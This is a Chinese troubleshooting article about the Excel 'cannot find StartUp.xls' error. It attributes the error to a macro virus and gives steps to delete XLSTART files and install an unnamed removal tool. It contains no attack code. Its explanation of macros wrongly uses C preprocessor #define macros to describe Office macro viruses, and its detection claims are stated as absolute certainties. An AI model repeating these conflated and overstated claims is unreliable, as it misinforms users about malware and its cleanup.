打开EXCEL时无法找到startup.xls文件的解决方法 平时打开excel时是否会发现无法找到startup.xls的情况，这是怎么回事呢，是不是中病毒了呢？本教程为大家介绍一下解决方法。 Q：在使用excel时，出现无法找到startup.xls，是怎么回事?如下图的对话框：“无法找到"Start Up.xls".请检查文件名的拼写,并检查文件位置是否正确.如果您正试图从" 文件"菜单上最近使用的文件列表中打开文件,请确认文件未被重命名、移动或删除"”。 A：出现无法找到startup.xls提示，是中了StartUp.xls宏病毒的原因。特别是经常下载各种excel附件，中StartUp.xls宏病毒也很正常。 下面提供一个宏病毒专杀工具，解决无法找到startup.xls一类的问题。 使用方法如下介绍： 第一，清除宏病毒文件(如果已中毒此步必须，如果没有中毒此步可略过) 在电脑上搜搜索xlstart文件夹，开始---搜索文件或文件夹--输入xlstart搜索，找到后把文件夹中的文件全删除了(这些都是自启动文件，一般不需要。但这是病毒文件的必经之地)，还有一个隐藏的xlstart文件夹，它的路径是C:Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART ，也打开看看有没有excel文件，有的就删除掉。 顺便看下C:Documents and Settings\Administrator\Application Data\Microsoft\Excel 目录下有没有excel表格文件，有的话也删除（一般情况下都是在这个目录文件夹下）。 XLSTART文件夹不要删除。 第二，直接打开"宏病毒免疫工具v4.0"文件，单击“安装&升级”按钮即可。 通过上面介绍的方法，就能解决无法找到startup.xls一类的宏病毒问题。

宏病毒处理方法介绍

宏病毒处理方法介绍 一、宏的定义、宏病毒： 1.什么是宏：宏定义是C语言提供的三种预处理功能的其中一种，这三种预处理包括：宏定义、文件包含、条件编译。 宏定义又称为宏代换、宏替换，简称“宏”。 格式： #define 标识符字符串 其中的标识符就是所谓的符号常量，也称为“宏名”。 预处理（预编译）工作也叫做宏展开：将宏名替换为字符串。 掌握"宏"概念的关键是“换”。一切以换为前提、做任何事情之前先要换，准确理解之前就要“换”。 即在对相关命令或语句的含义和功能作具体分析之前就要换： 例： #define Pi 3.1415926 把程序中出现的Pi全部换成3.1415926 2.宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

判断方法 虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒： 1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会弹出相应的警告框。而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。 2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。 3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。WORD中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE97中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出 OFFICE时自动屏蔽掉宏病毒防护选项。因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。也就是说一系列WORD模板、特别是normal.dot 已经被感染。